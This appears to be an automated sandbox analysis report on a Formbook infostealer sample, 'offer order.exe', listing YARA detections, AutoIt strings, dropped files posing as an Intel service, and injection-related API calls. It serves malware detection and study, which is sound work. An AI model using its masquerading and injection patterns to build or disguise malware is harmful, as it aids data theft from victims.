          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001A.00000002.358304950.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001A.00000002.358304950.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.359207981.00000000017F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.359207981.00000000017F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.343417017.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000002.343417017.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.344627421.0000000001710000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000002.344627421.0000000001710000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.356195697.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.356195697.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.344721716.0000000001740000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000002.344721716.0000000001740000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.494578696.0000000002BC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.494578696.0000000002BC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.492758749.0000000000B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.492758749.0000000000B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.491918579.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.491918579.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 22.2.igfxCUIService.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 22.2.igfxCUIService.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 22.2.igfxCUIService.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 22.2.igfxCUIService.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 12.2.offer order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 12.2.offer order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 12.2.offer order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 12.2.offer order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          AutoIt script contains suspicious stringsShow sources
          Source: offer order.exeAutoIt Script: EN LOCAL $ZPEPOD = DLLCALLADDRESS ("dword" , $Z56D565
          Source: igfxCUIService.exe.0.drAutoIt Script: EN LOCAL $ZPEPOD = DLLCALLADDRESS ("dword" , $Z56D565
          Binary is likely a compiled AutoIt script fileShow sources
          Source: offer order.exe, 00000000.00000000.225143786.0000000000E75000.00000002.00020000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: offer order.exe, 00000000.00000000.225143786.0000000000E75000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: igfxCUIService.exe, 00000006.00000000.254238012.00000000000F5000.00000002.00020000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: igfxCUIService.exe, 00000006.00000000.254238012.00000000000F5000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: offer order.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: offer order.exe, 0000000C.00000000.281173325.0000000000E75000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: igfxCUIService.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: igfxCUIService.exe, 00000016.00000000.329321796.00000000000F5000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: wlanext.exe, 00000017.00000002.498168096.0000000003A24000.00000004.00000001.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: wlanext.exe, 00000017.00000002.498168096.0000000003A24000.00000004.00000001.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: offer order.exe
          PE file has a writeable .text sectionShow sources
          Source: offer order.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: igfxCUIService.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00419850 NtCreateFile,12_2_00419850
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00419900 NtReadFile,12_2_00419900
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00419980 NtClose,12_2_00419980
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00419A30 NtAllocateVirtualMemory,12_2_00419A30
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_004198FA NtReadFile,12_2_004198FA
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_0041997A NtClose,12_2_0041997A
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00419A2A NtAllocateVirtualMemory,12_2_00419A2A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9B00 NtSetValueKey,LdrInitializeThunk,23_2_032F9B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9A50 NtCreateFile,LdrInitializeThunk,23_2_032F9A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,23_2_032F9910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F99A0 NtCreateSection,LdrInitializeThunk,23_2_032F99A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9860 NtQuerySystemInformation,LdrInitializeThunk,23_2_032F9860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9840 NtDelayExecution,LdrInitializeThunk,23_2_032F9840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9710 NtQueryInformationToken,LdrInitializeThunk,23_2_032F9710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9770 NtSetInformationFile,LdrInitializeThunk,23_2_032F9770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9780 NtMapViewOfSection,LdrInitializeThunk,23_2_032F9780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9FE0 NtCreateMutant,LdrInitializeThunk,23_2_032F9FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9610 NtEnumerateValueKey,LdrInitializeThunk,23_2_032F9610
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9660 NtAllocateVirtualMemory,LdrInitializeThunk,23_2_032F9660
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9650 NtQueryValueKey,LdrInitializeThunk,23_2_032F9650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F96E0 NtFreeVirtualMemory,LdrInitializeThunk,23_2_032F96E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F96D0 NtCreateKey,LdrInitializeThunk,23_2_032F96D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9560 NtWriteFile,LdrInitializeThunk,23_2_032F9560
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9540 NtReadFile,LdrInitializeThunk,23_2_032F9540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F95D0 NtClose,LdrInitializeThunk,23_2_032F95D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032FA3B0 NtGetContextThread,23_2_032FA3B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9A20 NtResumeThread,23_2_032F9A20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9A00 NtProtectVirtualMemory,23_2_032F9A00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9A10 NtQuerySection,23_2_032F9A10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9A80 NtOpenDirectoryObject,23_2_032F9A80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9950 NtQueueApcThread,23_2_032F9950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F99D0 NtCreateProcessEx,23_2_032F99D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9820 NtEnumerateKey,23_2_032F9820
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032FB040 NtSuspendThread,23_2_032FB040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F98A0 NtWriteVirtualMemory,23_2_032F98A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F98F0 NtReadVirtualMemory,23_2_032F98F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9730 NtQueryVirtualMemory,23_2_032F9730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032FA710 NtOpenProcessToken,23_2_032FA710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9760 NtOpenProcess,23_2_032F9760
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032FA770 NtOpenThread,23_2_032FA770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F97A0 NtUnmapViewOfSection,23_2_032F97A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9670 NtQueryInformationProcess,23_2_032F9670
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F9520 NtWaitForSingleObject,23_2_032F9520
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032FAD30 NtSetContextThread,23_2_032FAD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032F95F0 NtQueryInformationFile,23_2_032F95F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_009A9850 NtCreateFile,23_2_009A9850
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_009A9980 NtClose,23_2_009A9980
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_009A9900 NtReadFile,23_2_009A9900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_009A9A30 NtAllocateVirtualMemory,23_2_009A9A30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_009A98FA NtReadFile,23_2_009A98FA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_009A997A NtClose,23_2_009A997A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_009A9A2A NtAllocateVirtualMemory,23_2_009A9A2A
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E240B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,12_2_00E240B1
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E18858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_00E18858
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_000A545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,22_2_000A545F
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_0041D80C12_2_0041D80C
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_0040102712_2_00401027
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_0040103012_2_00401030
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_0041D14112_2_0041D141
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_0040117612_2_00401176
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_0041C9D912_2_0041C9D9
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_0041CC9512_2_0041CC95
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00402D8812_2_00402D88
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00402D9012_2_00402D90
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_0041DF0C12_2_0041DF0C
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00409F8012_2_00409F80
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00402FB012_2_00402FB0
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E4804A12_2_00E4804A
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00DCE06012_2_00DCE060
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00DD414012_2_00DD4140
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00DE240512_2_00DE2405
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00DF652212_2_00DF6522
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E4066512_2_00E40665
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00DF267E12_2_00DF267E
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00DD684312_2_00DD6843
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00DCE80012_2_00DCE800
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00DE283A12_2_00DE283A
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00DF89DF12_2_00DF89DF
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E40AE212_2_00E40AE2
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00DF6A9412_2_00DF6A94
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00DD8A0E12_2_00DD8A0E
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E1EB0712_2_00E1EB07
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E28B1312_2_00E28B13
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00DECD6112_2_00DECD61
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_000C804A22_2_000C804A
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_0004E06022_2_0004E060
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_0005414022_2_00054140
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_0006240522_2_00062405
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_0007652222_2_00076522
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_000C066522_2_000C0665
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_0007267E22_2_0007267E
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_0004E80022_2_0004E800
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_0006283A22_2_0006283A
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_0005684322_2_00056843
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_000789DF22_2_000789DF
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_00058A0E22_2_00058A0E
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_00076A9422_2_00076A94
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_000C0AE222_2_000C0AE2
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_0009EB0722_2_0009EB07
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_000A8B1322_2_000A8B13
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_0006CD6122_2_0006CD61
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_0007700622_2_00077006
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_0005710E22_2_0005710E
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_0005319022_2_00053190
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_0004128722_2_00041287
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_000633C722_2_000633C7
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: 22_2_0006F41922_2_0006F419
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_03382B2823_2_03382B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032DA30923_2_032DA309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032DAB4023_2_032DAB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_0335CB4F23_2_0335CB4F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032EEBB023_2_032EEBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032E138B23_2_032E138B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_033623E323_2_033623E3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_0337DBD223_2_0337DBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_033703DA23_2_033703DA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032EABD823_2_032EABD8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032DB23623_2_032DB236
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_0336FA2B23_2_0336FA2B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_033822AE23_2_033822AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_03374AEF23_2_03374AEF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032D412023_2_032D4120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032BF90023_2_032BF900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032D99BF23_2_032D99BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_0338E82423_2_0338E824
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032DA83023_2_032DA830
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_0337100223_2_03371002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032E20A023_2_032E20A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_033820A823_2_033820A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032CB09023_2_032CB090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_033828EC23_2_033828EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_03381FF123_2_03381FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_0338DFCE23_2_0338DFCE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032D6E3023_2_032D6E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_0337D61623_2_0337D616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_03382EF723_2_03382EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032B0D2023_2_032B0D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_03382D0723_2_03382D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_03381D5523_2_03381D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032E258123_2_032E2581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_03372D8223_2_03372D82
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032CD5E023_2_032CD5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_033825DD23_2_033825DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032C841F23_2_032C841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_0337D46623_2_0337D466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_032DB47723_2_032DB477
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_0337449623_2_03374496
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_009AD80C23_2_009AD80C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_009AC9D923_2_009AC9D9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_009AD14123_2_009AD141
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_009ACC9523_2_009ACC95
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_00992D9023_2_00992D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_00992D8823_2_00992D88
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_00999F8023_2_00999F80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_00992FB023_2_00992FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 23_2_009ADF0C23_2_009ADF0C
          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\offer ordermgr.exe 30193B5CCF8A1834EAC3502EF165350AB74B107451145F3D2937FDF24B9ECEAE
          Source: Joe Sandbox ViewDropped File: C:\Users\user\UevAppMonitor\igfxCUIServicemgr.exe 30193B5CCF8A1834EAC3502EF165350AB74B107451145F3D2937FDF24B9ECEAE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 032BB150 appears 136 times
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: String function: 00060D27 appears 41 times
          Source: C:\Users\user\UevAppMonitor\igfxCUIService.exeCode function: String function: 00047F41 appears 31 times
          Source: C:\Users\user\Desktop\offer order.exeCode function: String function: 00DE0D27 appears 36 times
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6232 -s 244
          Source: offer order.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: offer order.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: offer order.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: offer order.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: offer ordermgr.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: offer ordermgr.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: offer ordermgr.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: igfxCUIService.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: igfxCUIService.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: igfxCUIService.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: igfxCUIService.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: igfxCUIServicemgr.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: igfxCUIServicemgr.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: igfxCUIServicemgr.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: offer order.exe, 0000000C.00000002.360419144.0000000001F9F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs offer order.exe
          Source: offer order.exe, 0000000C.00000002.359409209.00000000018B9000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs offer order.exe
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dllJump to behavior
